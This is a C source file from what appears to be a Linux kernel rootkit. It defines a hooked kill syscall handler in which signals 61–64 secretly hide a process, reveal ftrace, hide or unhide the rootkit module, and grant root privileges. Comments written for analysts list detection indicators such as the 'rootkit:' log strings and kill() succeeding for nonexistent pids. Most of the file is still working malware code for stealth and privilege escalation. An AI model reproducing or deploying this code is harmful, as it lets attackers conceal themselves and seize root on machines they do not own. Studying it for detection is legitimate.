//
// Created by sciver on 10/17/22.
//
#include "hook_kill.h"
#include "hide_module.h"
#include "setroot.h"
#include "reveal_ftrace.h"
#include "hide_process.h"
/* Saved pointer to the original kill syscall handler. hook_kill() forwards
 * every signal it does not consume through this pointer. It is not assigned
 * anywhere in this file -- presumably the hook-installation code elsewhere
 * fills it in (confirm against the installer). */
asmlinkage long (*orig_kill)(const struct pt_regs *);
/*
 * hook_kill - handler that stands in for the kill syscall.
 *
 * Reads the signal number from regs->si and the target pid from regs->di
 * (the second and first syscall arguments on x86-64). Signals 61..64 are
 * treated as control commands and consumed here: the function returns 0
 * and never calls orig_kill, so no signal is delivered and the pid is not
 * looked up. Every other signal is handed to orig_kill unchanged.
 *
 * Notes for analysts and detection engineering:
 *  - 61..64 sit at the top of the Linux real-time signal range, so
 *    legitimate use of these numbers is uncommon.
 *  - Each command path emits a KERN_INFO line prefixed "rootkit:"; those
 *    strings are indicators both in the kernel log and in the module
 *    binary.
 *  - Because a command signal returns 0 without any pid lookup, kill()
 *    reporting success for a pid that does not exist is an observable
 *    anomaly on an affected host.
 *  - No caller or credential check is visible before any command branch,
 *    including the one that calls set_root().
 *
 * hide_pid, hidden, reveal_ftrace(), hideme(), showme() and set_root()
 * are declared outside this file; what they do is inferred here only from
 * the adjacent log text.
 *
 * Return: 0 for a consumed command signal, otherwise whatever orig_kill
 * returns (narrowed to int by this function's return type).
 */
asmlinkage int hook_kill(const struct pt_regs *regs)
{
    int pid = regs->di;
    int sig = regs->si;

    if (sig == 61) {
        /* Record the pid as decimal text in hide_pid. The buffer's size is
         * not visible from this file and sprintf() is unbounded, so the
         * declaration should be checked to hold any int plus the NUL. */
        printk(KERN_INFO "rootkit: hiding process with pid %d\n", pid);
        sprintf(hide_pid, "%d", pid);
        return 0;
    }

    if (sig == 62) {
        printk(KERN_INFO "rootkit: reavealing ftrace!\n");
        reveal_ftrace();
        return 0;
    }

    if (sig == 63) {
        /* Toggle on the `hidden` flag; any value other than 0 or 1 leaves
         * the state untouched but the signal is still swallowed. */
        if (hidden == 0) {
            printk(KERN_INFO "rootkit: hiding rootkit!\n");
            hideme();
            hidden = 1;
        } else if (hidden == 1) {
            printk(KERN_INFO "rootkit: revealing rootkit!\n");
            showme();
            hidden = 0;
        }
        return 0;
    }

    if (sig == 64) {
        printk(KERN_INFO "rootkit: giving root...\n");
        set_root();
        return 0;
    }

    /* Not a command signal: behave like the unhooked syscall. */
    return orig_kill(regs);
}